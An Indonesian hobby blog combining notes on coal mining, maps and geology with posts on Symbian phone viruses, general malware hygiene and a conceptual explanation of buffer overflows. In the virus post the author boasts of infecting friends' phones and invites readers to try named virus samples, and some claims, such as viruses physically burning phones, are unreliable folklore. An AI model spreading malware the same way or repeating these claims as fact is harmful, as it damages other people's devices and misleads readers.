Minggu

Jenis Penambangan Batubara Alam

Batubara adalah batuan yang berasal dari tumbuhan yang mati dan tertimbun endapan lumpur, pasir dan lempung selama berjuta-juta tahun lamanya. Adanya tekanan lapisan tanah bersuhu tinggi serta terjadinya gerak tektonik mengakibatkan terjadinya pembakaran atau oksidasi yang mengubah zat kayu pada bangkai tumbuh-tumbuhan menjadi batuan yang mudah terbakar yang bernama batubara.



Di Indonesia terdapat tambang besar batubara seperti tambang umbilin di sawahlunto sumatera barat dan tambang bukit asam di sumatra selatan.

Beberapa macam / jenis metoda penambangan batubara :

Penambangan Terbuka
Melakukan kegiatan menambang batubara tanpa melakukan penggalian berat karena karena letak batubara yang dekat dengan permukaan bumi.


Penambangan Dalam
Untuk menambang batubara dengan teknik tersebut harus dibuat terowongan yang tegak hingga mencapai lapisan batubara. Selanjutnya dibuat terowongan datar untuk melakukan penambangan.


Penambangan Jauh
Pertambangan ini dilakukan ketika area batubara berada di bawah bukit di mana dibuat terowongan miring hingga mencapai lapisan batu bara.


Penambangan Di Atas Permukaan
Jenis kegiatan menambang batubara ini dilakukan jika batubara yang diincar berada pada perut bukit, yang di mana perlu terowongan datar untuk dapat mulai menambang batubara tersebut.


Keuntungan dari tambang terbuka :
1. Ongkos penambangan per ton/ per BCM bijih lebih murah karena tidak perlu adanya penyanggaan, ventilasi, dan penerangan.
2. Kondisi kerjanya lebih baik karena berhubungan langsung dengan udara luar dan sinar matahari.
3. Penggunaan alat-alat mekanis dengan ukuran besar dapat lebih leluasa sehingga produksi bisa lebih besar.

Jumat

PETA

Secara garis besar tahapan untuk mendapatkan suatu peta (proses pemetaan), yaitu :
•Pengumpulan data lapangan,
•Pengolahan data lapangan, dan
•Penyajian data lapangan.

Prinsip Utama Peta
Prinsip utama peta untuk dapat digunakan, yaitu :
•Menyatakan posisi/lokasi suatu tempat di permukaan bumi.
•Memperlihatkan pola distribusi dan pola spasial dari fenomena alam dan buatan manusia.
•Merekam dan menyimpan informasi permukaan bumi.

Karakteristik Peta

Peta memiliki beberapa karakteristik sebagai berikut :
•Gambar disajikan pada bidang datar dalam bentuk dua dimensi (hasil transformasi matematik).
•Merupakan bentuk reduksi dari keadaan sebenarnya.
•Dalam penyajiannya mengalami suatu proses generalisasi, sehingga tidak semua informasi dapat disajikan.
•Merupakan suatu bentuk penegasan (enhancement) dari unsur yang terdapat di permukaan bumi (misal : kontur).

Fungsi Peta

Peta mempunyai beberapa fungsi, yaitu :
•Memperlihatkan posisi atau lokasi relatif dari suatu tempat.
•Memperlihatkan ukuran dalam pengertian jarak dan arah.
•Memperlihatkan bentuk atau unsur yang terdapat di permukaan bumi.
•Menghimpun serta menselektif data permukaan bumi.

Bentuk Penyajian Peta

Berdasarkan penyajiannya, peta dapat dikelompokkan sebagai berikut :
•Peta Garis (peta vektor)
Kenampakan permukaan bumi pada peta disajikan oleh garis (baik hitam putih maupun berwarna) dan area yang dilengkapi dengan teks sebagai tambahan informasi. Unsur yang terdapat di permukaan bumi disajikan dengan simbol atau batas. Dengan kata lain, peta garis adalah peta yang memiliki jarak dan arah.
•Peta Citra (peta foto)
Kenampakan permukaan bumi disajikan dalam bentuk citra (sekumpulan informasi yang berasal dari sensor, perolehan tidak secara kontak langsung dengan obyek permukaan bumi ditempat pengamatan). Bayangan permukaan bumi dapat diperoleh melalui foto udara, radar serta sensor airborne lainnya dan citra satelit.


Jenis Peta

Berdasarkan jenisnya, peta dapat dikelompokkan sebagai berikut :

1. Peta Topografi
Peta Topografi merupakan peta yang memperlihatkan posisi horisontal serta vertikal dari unsur alam dan unsur buatan manusia dalam suatu bentuk tertentu, dengan memperhatikan sistem proyeksi peta yang digunakan serta skala peta. Umumnya peta topografi dibuat untuk keperluan perencanaan pembangunan, karena pada peta topografi disajikan unsur-unsur permukaan bumi yang sesuai dengan kondisi pada saat pembuatan petanya. Peta Topografi disebut juga sebagai peta dasar, karena peta topografi digunakan sebagai dasar untuk pembuatan peta-peta lainnya, baik untuk pembuatan peta topografi dengan skala peta yang lebih kecil dari peta aslinya (original map), atau juga untuk pembuatan peta-peta tematik.
Berikut adalah contoh peta topografi :
•Peta Planimetrik
Peta yang menyjikan informasi tentang beberapa tipe unsur permukaan bumi, pada peta ini informasi ketinggian tidak disajikan.
•Peta Teknik
Peta yang menyajikan detail permukaan bumi untuk keperluan proyek rekayasa (jalan, dam), dan juga untuk keperluan estimasi biaya konstruksi.
•Peta Pendaftaran Tanah/Kadaster
Peta yang menyajikan data mengenai garis kepemilikan tanah berikut sudut dan panjangnya, pemilik, ukuran persil, serta beberapa informasi lainnya.
•Peta Bathimetrik
Peta yang menyajikan kedalaman air dan konfigurasi topografi bawah laut, umumnya mempunyai sistem koordinat yang bereferensi pada sistem koordinat peta topografi.

2. Peta Tematik
Peta tematik adalah peta yang menyajikan unsur-unsur tertentu dari permukaan bumi sesuai dengan topik atau tema dari peta bersangkutan. Umumnya peta ini digunakan sebagai data analisis dari beberapa unsur permukaan bumi didalam pengambilan suatu keputusan untuk pembangunan. Pada pembuatan peta tematik, data dasar yang digunakan adalah peta topografi, sedang data tematik yang disajikan adalah hasil survey langsung (data primer) dan survey tidak langsung (data sekunder). Penyajian data topografi pada peta tematik disesuaikan dengan unsur yang diperlukan di dalam menunjang data tematik yang disajikan. Data tematik yang disajikan dapat dalam bentuk kualitatif dan/atau data kuantitatif. Berikut ini beberapa contoh peta tematik :

•Peta Diagram
Pada peta diagram, dua atau lebih subyek tematik yang berelasi disajikan dalam bentuk diagram yang proporsional. Diagram yang disajikan dapat dalam bentuk diagram batang, lingkaran, empat persegi panjang, diagram kurva. Masing-masing diagram disajikan pada posisi dari suatu lokasi atau dipusat area. Misal : peta industri.
•Peta Distribusi
Peta tematik yang menggunakan simbol titik untuk menyajikan suatu data yang spesifik, serta mempunyai kuantitas yang pasti dari sejumlah variabel. Misal : peta sebaran penduduk.
•Peta Choropleth
Peta tematik yang menyajikan ringkasan distribusi kuantitatif dengan basis deliminasi area batas administrasi. Misal : peta kepadatan penduduk.
•Peta Dasymetrik
Peta tematik sejenis choropleth, tetapi biasanya bukan pada batas administrasi, melainkan pada batas dari area yang disurvey.
•Peta Chorochromatik
Peta tematik yang memperlihatkan distribusi kualitatif dari fenomena spesifik dan relasinya. Misal : peta tanah.
•Peta Isoline
Peta tematik yang memperlihatkan harga numerik untuk distribusi yang kontinyu, dalam bentuk garis-garis yang terhubung pada suatu harga yang sama. Misal : peta isobar.
•Peta Alir
Peta tematik yang menyajikan informasi dalam bentuk garis tebal atau warna untuk memperlihatkan arah atau frekuensi pergerakan.Misal : peta frekuensi transportasi.
•Chart
Peta tematik yang bersifat khusus. Chart merupakan peta yang menyajikan data dan informasi yang berhubungan dengan unsur navigasi atau keselamatan perhubungan. Jenis chart yang dikenal adalah Peta Navigasi Laut (Nautical Chart) dan Peta Navigasi Udara (Aero Nautical Chart).

Golongan bahan galian tambang

Bahan-bahan galian terbagi atas tiga golongan:

1. Golongan bahan galian yang strategis adalah:
o minyak bumi, bitumen cair, lilin bumi, gas alam;
o bitumen padat, aspal;
o antrasit, batubara, batubara muda;
o uranium, radium, thorium dan bahan-bahan galian radioaktif lainnya;
o nikel, kobalt;
o timah.

2. Golongan bahan galian yang vital adalah:
o besi, mangan, molibden, khrom, wolfram, vanadium, titan;
o bauksit, tembaga, timbal, seng;
o emas, platina, perak, air raksa, intan;
o arsin, antimon, bismut;
o yttrium, rhutenium, cerium dan logam-logam langka lainnya;
o berillium, korundum, zirkon, kristal kwarsa;
o kriolit, fluorpar, barit;
o yodium, brom, khlor, belerang;

3. Golongan bahan galian yang tidak termasuk golongan 1 atau 2 adalah:
o nitrat-nitrat, pospat-pospat, garam batu (halite);
o asbes, talk, mika, grafit, magnesit;
o yarosit, leusit, tawas (alum), oker;
o batu permata, batu setengah permata;
o pasir kwarsa, kaolin, feldspar, gips, bentonit;
o batu apung, tras, obsidian, perlit, tanah diatome, tanah serap (fullers earth);
o marmer, batu tulis;

Beberapa istilah dalam Geologi

Dalam penerapan teknologi penginderaan jauh untuk studi inventarisasi sumber daya mineral, ada beberapa istilah geologi yang sering digunakan, yaitu :


1. Peta geologi adalah bentuk ungkapan data dan informasi geologi suatu daerah / wilayah / kawasan dengan tingkat kualitas yang tergantung pada skala peta yang digunakan dan menggambarkan informasi sebaran, jenis dan sifat batuan, umur, stratigrafi, struktur, tektonika, fisiografi dan potensi sumber daya mineral serta energi yang disajikan dalam bentuk gambar dengan warna, simbol dan corak atau gabungan ketiganya.

2. Skala peta adalah perbandingan jarak yang tercantum pada peta dengan jarak sebenarnya yang dinyatakan dengan angka atau garis atau gabungan keduanya.

3. Peta geologi dapat dibedakan atas peta geologi sistematik dan peta geologi tematik.

4. Peta geologi sistematik adalah peta yang menyajikan data geologi pada peta dasar topografi atau batimetri dengan nama dan nomor lembar peta yang mengacu pada SK Ketua Bakosurtanal No. 019.2.2/1/1975 atau SK penggantinya.

5. Peta topografi adalah peta ketinggian titik atau kawasan yang dinyatakan dalam bentuk angka ketinggian atau kontur ketinggian yang diukur terhadap permukaan laut rata-rata.

6. Peta geologi tematik adalah peta yang menyajikan informasi geologi dan/atau potensi sumber daya mineral dan/atau energi untuk tujuan tertentu.

7. Pemetaan geologi adalah pekerjaan atau kegiatan pengumpulan data geologi, baik darat maupun laut, dengan berbagai metoda.

8. Sumber daya geologi adalah sumber daya alam yang meliputi sumber daya mineral, energi, air tanah, bentang alam dan kerawanan bencana alam geologi.

Rabu

Virus Ponsel Gimana Seh? Berbahaya??


Halo para pengunjungku(^_^) gak bosen-bosen kan kalian berkunjung kesini? Seperti yang sudah saya bilang, blog ini selalu ter-update, jadi kamu tidak akan ketemu artikel yang itu-itu saja alias tidak ada artikel baru.

Apalah ilmu kalau bukan untuk dibagi-bagikan (berguna buat orang lain), toh saya juga mendapat pahala dan kamu dapat pengetahuan baru (dengerin tuh christin, lu pelit amat ngajarin gue deface pake cara inject SQL). Cuma pahala yang tadinya saya dapat (kembali pake kata-kata "saya" biar lebih wibawa dikit,hehehe..) bakalan jadi dosa kalo kamu menyalahgunakan semua pengetahuan yang ada di blog ini

Kali ini saya mau coba membuka pikiran kalian tentang dunia pervirusan (keren amat namanya). Cuma bedanya dari yang sebelumnya adalah virus-virus yang akan saya bahas ini adalah virus-virus yang berondok (bersembunyi) di ponsel smartphone ber-OS Symbian. Suatu ketika pernah saya meminjam ponsel Efrianto (teman saya di kelas tambang B dan satu angkatan dengan saya di universitas kami tercinta, huhuhu...). Lagi asyik-asyiknya ngutak-atik ponsel dia, eh saya ketemu tema (themes) dengan nama Commwarrior, yang membuat latar ponselnya bergambar tengkorak. Waktu saya tanya (pura-pura bego) dia dengan bangga bilang "Itu metal, men!! Gaul, gambar tengkorak", nampaknya teman saya ini tidak tahu bahaya yang sedang mengancam ponselnya. Karena teman baik saya, tidak tega rasanya membiarkan gitu saja, maka saya copy dulu virus-virusnya ke ponsel saya setelah itu saya hapus alias musnahkan semua virus yang nongkrong di ponselnya. Alhamdulilah bisa, tapi ada satu virus yang bandel, tidak bisa dihapus, yaitu virus baselo (kalo tidak tau apa itu virus baselo, baca saja terus artikel ini sampai tuntas, ada kok penjelasannya).

Emang neh para virus maker udah meluaskan daerah jajahannya ke dunia ponsel (sebelumnya hanya PC yang dijangkiti virus). Ponsel yang rentan diserang virus adalah ponsel berplatform symbian, mau symbian keberapa kek tetep aja bakal diserang virus! Karena apa? Symbian itu kan merupakan sistem operasi terbuka dan memungkinkan menambah banyak aplikasi ke dalam ponsel, nah dari situlah jalan para virus menyusup ke ponsel kamu. Ngerti kan sekarang? Virus symbian banyak jumlahnya, tapi disini saya hanya menjelaskan 11 virus symbian yang sudah saya tes/coba ke ponsel saya. Tes ini sendiri saya lakukan ketika ponsel saya masih Nokia 6680 dan N-Gage classic, sekarang saya tidak memakai ponsel ber-OS symbian lagi, capek delete virus terus!! Ini dia virusnya:


CABIR

Virus Cabir merupakan virus ponsel pertama yang ditemukan. Serangan Virus Cabir pertama kali terdeteksi 15 Juni 2004 dan dikenal dengan nama Cabir.A/SymbOS/Cabir.A, EPOC/Cabir.A, Worm.Symbian.Cabir.a, dan virus Caribe. Sejak itu muncul berbagai macam varian dari virus Cabir. Hingga akhir tahun 2004 telah dikenal 9 varian dari virus Cabir.

Jika kamu mempunyai ponsel Bluetooth dengan sistem operasi symbian Tak perlu khawatir. Sepanjang tidak mengaktifkan mode Hidden, Virus Cabir tidak akan menghancukan file di ponsel kamu. Virus cabir hanya akan menyerang ponsel Bluetooth dengan posisi mode Discoverable.
Setelah menyusup ke dalam ponsel, virus cabir masuk sebagai inbox yang berisi file Caribe.sis. Pada saat ponsel menjalankan dan menginstall file ini, maka virus akan mulai aktif dan mencari sasaran ponsel Bluetooth baru untuk diserangnya.

Sekalipun Bluetooth pada ponsel dalam posisi disable, jika sudah terinstalasi dan terinveksi, maka Virus Cabir akan terus berusaha untuk menginfeksi ponsel lain secara periodik sekitar 15-20 menit sekali. Ketika pertama kali dijalankan/reboot, virus Cabir.A akan menampilkan pesan Caribe-VZ/29a.
Tak ada kerusakan file yang berarti, hanya saja jika ponsel Kamu terinfeksi, baterainya akan cepat habis karena digunakan untuk mencari perangakat Bluetooth lainnya.

Virus cabir masih memiliki kelemahan, ia tidak akan secara otomatis terkirim pada ponsel sasarannya, tetapi memerlukan jawaban YES dari calon korban yang akan menerima transfer file tersebut. Jadi kalau tiba-tiba ada file diterima di ponsel, dan meminta jawaban YES, jangan ditekan tombol itu.

Satu hari kemudian setelah kemunculan virus Cabir.A, muncul varian baru virus Cabir.B. Virus cabirB memiliki cara kerja yang sama dengan virus sebelumnya namun pada Caribe.B pesan Caribe-VZ/29a akan digantikan dengan pesan [Caribe] saja, selain itu juga lokasi instalasi virus turut berbeda.

Untuk mencegahnya, matikan (disable) fitur Bluetooth ponsel kamu. Aktifkan hanya saat akan digunakan. Jangan mengisntal aplikasi Symbian dengan nama caribe.sis jika kamu menerima kiriman file tersebut.


Nah ini adalah uraian data virus Cabir beserta variannya...

1. Nama Virus : Cabir.A Nama file virus : caribe.sis
2. Nama Virus : Cabir.B Nama file virus : caribe.sis
3. Nama Virus : Cabir.C Nama file virus : mytiti.sis
4. Nama Virus : Norton Antivirus 2004 Nama file virus : norton antivirus 2004 professional.sis
5. Nama Virus : Cabir.D Nama file virus : myiti.sis | Norton Antivirus 2004 Professional.sis
6. Nama Virus : Cabir.E Nama file virus : yuan.sis
7. Nama Virus : Cabir.F Nama file virus : skulls.sis
8. Nama Virus : Cabir.G Nama file virus : Tee222.sis
9. Nama Virus : Cabir.H Nama file virus : velasco.sis
10.Nama Virus : Cabir.L Nama file virus : skulls.sis
11.Nama Virus : Cabir.M Nama file virus : free8.sis
12.Nama Virus : Cabir.N Nama file virus : sexy.sis
13.Nama Virus : Cabir.O Nama file virus : mobile.sis
14.Nama Virus : Cabir.P Nama file virus : skulls.sis
15.Nama Virus : Cabir.Q Nama file virus : 22207.sis
16.Nama Virus : Cabir.S Nama file virus : guan4u.sis
17.Nama Virus : Cabir.T Nama file virus : iLoveU.sis
18.Nama Virus : Cabir.U Nama file virus : SEXXXY.sis
15.Nama Virus : Cabir.V Nama file virus : GAVNOR.SIS
19.Nama Virus : Cabir.Y Nama file virus : symTEE.SIS


Cara penyebaran Cabir adalah :

1. Device yang menggunakan bluetooth akan menampilkan pesan
Receive message via Bluetooth from [Device Name]?
2. Dan jika diterima, maka pengguna akan menerima notifikasi bahwa pesan tersebut telah diterima
3. Pengguna akan menerima pesan berupa peringatan :
Application is untrusted and may have problems. Install only if you trust provider.
4. Dan jika pengguna memilih ya, maka virus worm akan terinstall. Dan selanjutnya mencari device bluetooth yang aktif lainnya.
5. Virus Cabir ini akan aktif setiap kali handphone tersebut dinyalakan.


File-file yang di-install oleh Cabir ini adalah:

1. c:\system\apps\caribe\caribe.app
2. c:\system\apps\caribe\caribe.rsc
3. c:\system\apps\caribe\flo.mdl
4. c:\system\symbiansecuredata\caribesecuritymanager\caribe.app
5. c:\system\symbiansecuredata\caribesecuritymanager\caribe.rsc
6. c:\system\symbiansecuredata\caribesecuritymanager\caribe.sis
7. c:\system\recogs\flo.mdl
8. c:\system\install\caribe.sis


Jika ponsel telanjur menginstal file caribe.sis, Kamu dapat melakukan pembersihan sendiri. Caranya:
Untuk varian a dan b

- Instal dan jalankan aplikasi X-plore.
- Hapus file c:\system\recogs\flo.mdl kemudian reboot ponsel kamu.
- Jalankan aplikasi manager.
- Uninstal caribe.sis melalui aplikasi manager (pada menu utama Nokia 3230 terdapat di folder tool/manager)
- Hapus semua file yang terdapat di c:\system\symbiansecuredata\caribesecuritymanager.
- Untuk nokia seri 60 versi 2 (nokia 6600, 7610 keatas) , file flo.mdl tidak begitu berpengaruh terhadap sistem booting.

Untuk varian c sampai e:

- Hapus file-file yang terdapat dalam folders c:\system\symbiansecuredata\ yaitu:
c:\ mytitisecuritymanager
d:\ [yuan]securitymanager
e:\ securitymanager

Virus Cabir Varian l sampai t:

- Gunakan aplikasi file manager, hapus file (nama varian).MDL yang terletak di System\recogs.
- Reeboot ponsel.
- Hapus direktori atau folder c:\System\apps\(nama varian).




Mabir

Neh virus merupakan variannya Cabir. Dia bukan tipe yang menyebar, tapi mampu mereplikasi dirinya lewat pesan-pesan MMS yang dikirimnya. Mabir pada dasarnya hanya menyebar lewat bluetooth dengan tambahan fungsi MMS. Sewaktu masih pake N-Gage classic dulu, pernah saya sengaja memasukkan mabir ke ponsel saya, alhasil ponsel saya jadi ngirim-ngirim MMS sendiri sehingga pulsa saya ludes, juga ketika saya ngirim-ngirim lagu via bluetooth sama teman, eh di ponsel teman saya tuh udah nongol si virus Mabir (hehehe, sory bos!). Setelah saya pelajari STRING dari virus ini, ternyata bersumber sama dengan Cabir. Pasti pembuatnya orang yang sama.

Begitu Mabir aktif, dia akan mencari ponsel ber-Bluetooth pertama yang ditemukannya dan mulai mengirim salinan dirinya ke ponsel tersebut. Sedangkan kalo penyebaran melalui MMS, Mabir tidak hanya sekedar membaca phonebook kamu, tapi juga mampu menjawab sms atau MMS yang dikirim ke ponsel kamu (yang terinfeksi) dengan pesan MMS bervirus. Tentu saja pada ponsel yang mendukung fitur GPRS dan MMS lah, kalo "ponsel ganjal motor" seh seumur-umur aman dari virus. Sampelnya vcabir.sis


SKULLS

Tau kan apa artinya "skulls"?? Kalo tau baguslah, brarti saya tidak perlu menjelaskan lagi. Virus ini menggunakan nama "Extended theme.sis" dan ia menyatakan diri sebagai theme manager untuk smartphone Nokia 7610. Begitu terinstall, virus ini akan menyulap semua icon di ponsel menjadi gambar tengkorak dengan 2 tulang saling bersilang. Baik itu icon pesan, web, pokoknya semua deh! Semua fitur seperti phonebook, sms, mediaplayer lambat laun bisa tidak aktif lagi. Pada akhirnya ponsel yang terinfeksi virus ini hanya bisa melakukan panggilan dan menerima panggilan saja. Sampelnya vskull.sis


Doomed

Kalo neh virus mampu menonaktifkan beberapa aplikasi dan mencegah ponsel melakukan restart. Virus ini juga membuat ponsel ber-Bluetooth berdekatan akan melakukan restart secara otomatis.


CardTrip

Neh anak hampir mirip sama skulls kalo dilihat dari cara penyebarannya. Virus ini mengganti data-data di ponsel dengan salinan corrupt. Tapi tenang aja, kalo kita melakukan restart terhadap ponsel, ia akan terhapus, yang jadi masalah, meskipun virus ini udah musnah, ia meninggalkan semacam installer bagi temen2nya seperti skulls, commwarrior, dan cabir dalam perangkat yang terinfeksi (neh virus slogannya mati satu tumbuh seribu, hehehe..)


Dropper

Kalo ini varian dari virus Cabir atau Caribe. Kalo dia nih udah terinstall di ponsel kamu, dia bakalan menginstall virus-virus laenke ponsel kamu seperti Cabir.B, Cabir.C, dan Cabir.D.
C Dropper memiliki kemampuan untuk men-disable program aplikasi kontrol bluetooth sehingga kamu tidak bisa mengubah settingnya. C Dropper akan menempatkan varian cabir ini ke dalam berbagai lokasi pada file sistem ponsel kamu. Beberapa cabir yang terinstall akan mengubah aplikasi pihak ketiga (third party maksudnya) sehingga pengguna yang memiliki program aplikasi ini akan digantikan dengan Cabir.D dan icon pada menk menjadi kosong (blank). Kalo kamu meng-klik icon yang sudah digantikan ini maka Cabir.D akan mulai beraksi untuk menyebar ke ponsel-ponsel yang paling dekat dengan dia). Virus ini cerdik, saya menemukan file komponen semacam autostart pada drive C dan E, dengan file ini si virus bakalan aktif secara otomatis saat ponsel dihidupkan.


ThunderBolt

Visus ini cuma bisa ngabisin baterai ponsel kamu, membuatnya panas sehingga ada komponen ponsel yang terbakar. Kalo dah gitu, rusak dunk...


DeathNote

Sesuai dengan namanya, virus ini sangat kejam, sadis plus mematikan. Ponsel mana yang telah terinfeksi tidak diberi ampun. Ya masih bisa bertahan, minimal dalam keadaan sekarat alias hang, kalo maksimalnya ya langsung almarhum. Hehehe...

Untuk virus yang satu ini saya tidak berani ngetes ke ponsel saya, ya karena virus ini benar-benar gila menurut saya, sebab saya lihat ponsel teman-teman saya yang kena virus ini rusak berat, lagipula antivirusnya susah dicar. Jika melihat ponsel mereka yang diserang virus ini, virus ini bersemayam (melekat) di dalam sebuah file mp3. Begitu selesai diputar, mati deh ponselnya, seakan-akan tuh lagu adalah pesam terakhir dari ponsel kamu, hiks..hiks..
Well, selera humor si pembuat virus ini oke juga.


Baselo

Dari semua virus yang saya coba, ini lah yang susah betul untuk dihapus. Tanyakan saja pada M.YANDRI NS, anak tambang A (bagi yang kenal dan satu kampus sama saya, hehehe...). Ke ponsel dialah pertama kali saya coba. Kasian juga dia, pulsanya abis gara-gara ni virus (maap ya bos^_^)
Virus baselo ini masuk melalui bluetooth dari ponsel seseorang yang terinfeksi virus ini. Kalo bluetooth orang tersebut sama-sama ON otomatis ponsel yang terinfeksi virus ini akan mengirim salinan dirinya kepada orang yang bluetoot-nya aktif tadi. Yang jelas masih dalam jangkauan bluetooth. Virus ini mengirim file salinan dirinya dengan nama yang bagus menurut saya sehingga membuat penerima dengan ikhlas menelan bulat-bulat virus itu ke dalam ponselnya. Nama-nama file virus ini adalah: sexg.mp3, love.jpg, hot sex.3gp, beauty.jpg, pokoknya yang ngeres-ngeres gitu deh, dan kalo si penerima kebetulan emang tukang ngeres tanpa babibu lagi pasti langsung membuka file ini, jadilah si virus aktif..
Kalo si virus sudah masuk, otomatis ia akan memanem phonebook kamu, kemudian mengirim MMS ke nomor di phonebook kamu tadi. Kalo tidak segera dihapus, pulsa kamu akan amblas meskipun ganti kartu ampe 1000x pun!! (selama GPRS kartu aktif dan ponsel mendukung fitur GPRS).
Yang membuat susah dihapus sebenarnya karena file komponen virus ini ada yang berstatus running. Waktu saya menghapusnya saya bunuh dulu sistem yang lagi running itu, namanya xzhmun.sis




Hati-hati

Nama virus emang aneh-aneh aja. Virus ini banyak terdapat di ponsel symbian (ponsel ber-OS). Dia ini senang sembunyi di aplikasi guardian yang ada di drive C dan E, serta folder "recogs". Virus ini kerjanya terus menerus melakukan pengiriman sms ke nomor luar negeri. Kemudian operator akan mengirim sms bahwa ponsel kamu telah terinfeksi virus guardian dan harus segera dihapus (dalam jangka waktu tertentu), jika tidak fitur sms kartu akan diblokir. Temen-temen saya banyak yang kena virus ini.


Mosquitoes

Sebenarnya ini adalah game nyamuk pada ponsel, nah game mosquitoes yang telah di-crack-lah sebenarnya yang ada virus ini, sebab kgiatan cracking itu penuh cacat/bug yang berpotensi disisipi virus. Ketika kamu memainkan game mosquitoes, tanpa kamu sadari si virus mengirim sms/MMS ke sembarang nomor sehingga pulsa kamu abis. Sampelnya Mosquitos2.sis


Locknut

Nah, ini dia neh virur bebuyutan saya. Dua kali saya ganti hp dari Nokia 6680 ke N-Gage classic, tetap aja ngejar-ngejar saya. Tapi salah saya juga seh, sering internetan di hp. Virus locknut ini jenis trojan yang bekerja memamfaatkan kelemahan sistem symbian versi 7 (tapi tidak menutup kemungkinan ke semua versi symbian). Virus ini tergolong gawat juga, sebab dapat mengganti file biner pada sistem ROM (Drive Z). Itulah hebatnya dia, kita saja tidak bisa ngutak-atik drive Z. Jika sudah begitu kejadiannya, maka berakibat sistem operasi hp terhenti dan mengalami crash. Nih virus punya banyak nama samaran, mulai dari Locknut.A, sampai Symbos_Locknut.B.
Ciri-ciri hp yang terinfeksi virus ini adalah terdapat pesan App.Closed, AppArcServerThRead. Virus locknut turut memboncengi temannya yaitu Cabir, begitu juga sebaliknya. Sejoli banget;-)


Yah, itulah yang baru saya tau, masih banyak lagi virus symbian yang laennya, tidak cuma ini :-) Tapi kalo kamu pada penasaran, cari tau serndiri deh, ini dia virusnya, tapi saya tidak tanggung jawabbb yaaaa, You get Your Own Risk!!!
Ini tes sendiri Di Ponsel kAMU:
BtChatX 2007.sis
Casper.sis
H5N1.SIS
Symbos+AppDisabler+B.sis

Apa seh MALWARE itu (2)

Cara penanganan worm dan virus seh sebenarnya mudah aja.. Yang pertama, kita tidak membaca e-mail yang mencurigakan. Itu bisa dilihat dari subject-nya dan disertai file attach. Normalnya kamu curiga donk, gak ada angin eh tiba-tiba ada yang ngirim e-mail dengan subject aneh dan ada file attach-nya. Kedua, kamu jangan memasuki web yang kurang dikenal secara baik, sebab biasanya ada web-web tertentu yang sudah ditanam malware. Ketiga, kalo emang udah terlambat alias udah terinfeksi harus segera diisolasi (maksudnya diputuskan jaringan yang terkoneksi dengan komputer yang sedang sakit itu supaya tidak menyebar ke seluruh sistem atau komputer laen) lalu bersihkan dengan antivirus terbaru. Keempat, download dan pasang antivirus, anti spam dan firewall terbaru.

Ingat, terkadang sudah punya antivirus, anti spam dan firewall saja belum menjamin komputer kamu! Sedangkan Deepfreeze saja bisa dibobol, firewall juga.. Tau tidak sama Conficker? Atau virus kido deh (kalo tidak tau juga, ampun deh), nah dia ini bisa mengelabui antivirus yang akan men-scan komputer tempat dia bersembunyi, jadi dia bisa lewat gitu aja pas di-scan.. Pantaslah Conficker disebut rajanya dunia pervirusan di bumi ini, hehehe...

Senin

Buffer Overflow

Setelah bongkar-bongkar buku (bukannya saya tidak tau buffer overflow ya, saya mencari penjelasan lebih supaya lengkap dan mudah dipahami), inilah dia:

Buffer overflow adalah satu titik lemah yang sering ada. Tidak ada satu software pun, cepat atau lambat tidak dihampiri oleh titik lemah buffer overflow. Pasalnya, satu penyebab buffer overflow adalah prinsip aktifitas dari setiap software, yakni hasil salinan data yang dikirim oleh user dari suatu tempat ke tempat lainnya. Jika developer suatu program menguji semua data sebelum disalin, maka bisa jadi buffer overflow masuk ke dalam library yang digunakan oleh program tersebut.

Buffer overflow bisa disalahgunakan dengan dua alasan. Selain program yang berhubungan atau keseluruhan system ditabrakkan, satu Denial of Service dikeluarkan atau satu Code tranfer diimplementasikan. Untuk suatu penyerangan, implementasi Code lebih hebat lagi, dimana selanjutnya satu Denial of Service bisa dikeluarkan sewaktu-waktu. Yang sangat menarik adalah, buffer overflow dalam program, yang berjalan dengan privilegies tinggi, yakni Root pada Unix/Linux Systems dan Administrator pada Windows Systems. Namun hak bagi user normal juga penting, karena berasal dari sana lah titik lemah selanjutnya bisa disalahgunakan untuk mendapatkan privilegies tinggi dengan lebih mudah lagi.

Contoh sangat berbahaya, buffer overflow dalam program yang bisa diakses melalui network, seperti servers atau TCP/IP stack. Di sini ada satu contoh titik lemah yang ditemukan pada bulan April dalam Mailserver MailEnable [1]. Melalui satu header yang dasarnya telah disiapkan, satu buffer overflow dimunculkan dan selanjutnya Code diimplementasikan juga. Sebuah program yang menyalahgunakan titik lemah ini (satu yang dikenal sebagai Exploit), telah dipublikasikan dalam Internet [2]. Alhasil, satu "pintu belakang" ditutup, dan melalui pintu tersebut itulah aggressor bisa mengambil alih kontrol melalui komputer yang terhubung.

Bagi para aggressor, titik lemah tersebut mempunyai dua keuntungan, yakni mereka bisa menyelewengkannya, dan tidak bergantung pada aksi user manapun. Lalu, mereka bisa menentukan komputer mana yang ingin diserang. Pada titik lemah yang digambarkan di bawah, seorang aggressor paling tidak memilih user tertentu, yang dikiriminya satu email yang dipersiapkan untuk penyalahgunaan suatu titik lemah tersebut. Ia tidak mengetahui, di komputer yang mana email tersebut dibaca.

Kategori lainnya adalah buffer overflow dalam library. Ini yang disalah gunakan, dimana data yang telah siap dikeluarkan oleh suatu program, supaya bisa memanggil function yang berhubungan dengan library. Contoh tertentu dari kategori ini, yaitu titik lemah dalam Microsoft JPEG processing dalam GDI+ [3]. Titik lemah yang muncul pada September 2004 ini bisa disalahgunakan melalui satu foto JPEG yang telah disiapkan, untuk menjalankan code tertentu. Untuk itu, foto tertentu harusnya hanya dibuka dalam satu aplikasi, yang menggunakan library yang berhubungan. Pembacaan email atau website, yang berisi foto tersebut, telah cukup. Sesaat setelah publikasi titik lemah melalui Microsoft, muncullah gambar pertama di Internet, yang menyalahgunakan titik lemah tersebut, untuk menginstal satu trojaner dan juga membuka "pintu belakang" [4].

Bahaya tertentu pada titik lemah dalam libraries terdiri dari satu sistem yang telah di-patch menjadi sensitif, jika satu program pada installation-nya menukar koreksi library melalui satu versi lama yang sensitif dan selanjutnya menginstallnya. Biasanya user juga tidak mengetahui, apakah satu program tertentu menggunakan satu library sensitif dan functions yang berhubungan. Selanjutnya bahaya akibat titik lamah ini sulit ditentukan oleh user itu sendiri.

Buffer overflow dalam program aplikasi biasanya disalahgunakan melalui file yang telah disiapkan. Satu actual provider pada kategori ini adalah satu titik lemah dalam Word [5]. Satu dokumen yang telah disiapkan, menggiring ke satu buffer overflow, dan melaluinya code transfer disediakan. File semacam bisa dikirim misalnya melalui email atau ditawarkan untuk bisa didownload pada satu website. Code transfer diimplementasikan dengan seijin user. Jika ini bekerja sesuai ijin administrator, maka aggressor mendapatkan kontrol penuh mengenai komputer yang berhubungan.

Apa seh MALWARE itu?

